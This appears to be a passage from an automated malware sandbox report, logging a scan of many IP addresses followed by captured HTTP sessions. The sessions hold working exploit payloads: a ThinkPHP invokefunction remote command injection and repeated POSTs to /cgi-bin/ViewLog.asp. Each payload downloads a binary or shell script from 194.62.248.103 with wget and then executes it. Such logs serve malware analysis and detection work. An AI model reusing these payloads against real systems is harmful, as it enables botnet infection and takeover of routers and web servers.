                                                        Apr 14, 2024 16:34:56.812585115 CEST130308080192.168.2.2385.104.76.169
                                                        Apr 14, 2024 16:34:56.812597036 CEST130308080192.168.2.2331.242.77.28
                                                        Apr 14, 2024 16:34:56.812604904 CEST130308080192.168.2.2394.79.193.253
                                                        Apr 14, 2024 16:34:56.812622070 CEST130308080192.168.2.2362.4.0.204
                                                        Apr 14, 2024 16:34:56.812633991 CEST130308080192.168.2.2385.250.2.202
                                                        Apr 14, 2024 16:34:56.812647104 CEST130308080192.168.2.2394.1.178.4
                                                        Apr 14, 2024 16:34:56.812648058 CEST130308080192.168.2.2362.239.69.80
                                                        Apr 14, 2024 16:34:56.812652111 CEST130308080192.168.2.2394.226.107.34
                                                        Apr 14, 2024 16:34:56.812655926 CEST130308080192.168.2.2362.247.207.170
                                                        Apr 14, 2024 16:34:56.812669992 CEST130308080192.168.2.2362.18.211.97
                                                        Apr 14, 2024 16:34:56.812671900 CEST130308080192.168.2.2385.15.58.58
                                                        Apr 14, 2024 16:34:56.812680006 CEST130308080192.168.2.2331.228.106.153
                                                        Apr 14, 2024 16:34:56.812680960 CEST130308080192.168.2.2394.136.122.124
                                                        Apr 14, 2024 16:34:56.812699080 CEST130308080192.168.2.2331.134.170.123
                                                        Apr 14, 2024 16:34:56.812706947 CEST130308080192.168.2.2395.36.59.12
                                                        Apr 14, 2024 16:34:56.812720060 CEST130308080192.168.2.2394.39.59.26
                                                        Apr 14, 2024 16:34:56.812730074 CEST130308080192.168.2.2331.87.173.189
                                                        Apr 14, 2024 16:34:56.812731981 CEST130308080192.168.2.2331.225.255.53
                                                        Apr 14, 2024 16:34:56.812735081 CEST130308080192.168.2.2385.150.94.49
                                                        Apr 14, 2024 16:34:56.812750101 CEST130308080192.168.2.2395.111.3.236
                                                        Apr 14, 2024 16:34:56.812762022 CEST130308080192.168.2.2362.72.208.229
                                                        Apr 14, 2024 16:34:56.812783957 CEST130308080192.168.2.2395.148.254.44
                                                        Apr 14, 2024 16:34:56.812786102 CEST130308080192.168.2.2331.157.140.50
                                                        Apr 14, 2024 16:34:56.812789917 CEST130308080192.168.2.2394.67.111.129
                                                        Apr 14, 2024 16:34:56.812807083 CEST130308080192.168.2.2331.120.6.197
                                                        Apr 14, 2024 16:34:56.812812090 CEST130308080192.168.2.2394.27.144.24
                                                        Apr 14, 2024 16:34:56.812815905 CEST130308080192.168.2.2331.182.90.145
                                                        Apr 14, 2024 16:34:56.812829018 CEST130308080192.168.2.2395.142.84.93
                                                        Apr 14, 2024 16:34:56.812851906 CEST130308080192.168.2.2362.84.238.58
                                                        Apr 14, 2024 16:34:56.812853098 CEST130308080192.168.2.2331.246.150.231
                                                        Apr 14, 2024 16:34:56.812864065 CEST130308080192.168.2.2395.210.46.87
                                                        Apr 14, 2024 16:34:56.812887907 CEST130308080192.168.2.2394.202.66.2
                                                        Apr 14, 2024 16:34:56.812889099 CEST130308080192.168.2.2362.143.67.196
                                                        Apr 14, 2024 16:34:56.812889099 CEST130308080192.168.2.2395.131.241.211
                                                        Apr 14, 2024 16:34:56.812900066 CEST130308080192.168.2.2394.78.87.239
                                                        Apr 14, 2024 16:34:56.812908888 CEST130308080192.168.2.2395.173.209.7
                                                        Apr 14, 2024 16:34:56.812922001 CEST130308080192.168.2.2331.98.47.229
                                                        Apr 14, 2024 16:34:56.812926054 CEST130308080192.168.2.2362.129.191.149
                                                        Apr 14, 2024 16:34:56.812938929 CEST130308080192.168.2.2394.73.49.79

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        0192.168.2.2351090112.168.155.3280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:54.088280916 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:34:54.379527092 CEST502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:34:54 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1192.168.2.2346200112.175.21.7780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:54.088768959 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:34:54.378138065 CEST355INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.10.3 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:34:54 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 182
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2192.168.2.233586031.136.135.1358080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:54.147169113 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:34:55.142318010 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:34:57.126005888 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:01.317439079 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:09.252491951 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:25.122253895 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:58.397691011 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3192.168.2.233637295.139.180.1288080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:54.170124054 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:34:55.942461967 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:34:58.246006012 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:02.597390890 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:11.044174910 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:29.729471922 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:04.540916920 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4192.168.2.234631431.44.132.08080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:54.183387041 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5192.168.2.235401031.136.226.1088080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:54.460395098 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:34:55.430433035 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:34:57.317967892 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:01.317424059 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:08.996365070 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:24.098439932 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:54.302134037 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6192.168.2.235637831.136.46.688080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:34:54.461277962 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:34:55.430425882 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:34:57.349991083 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
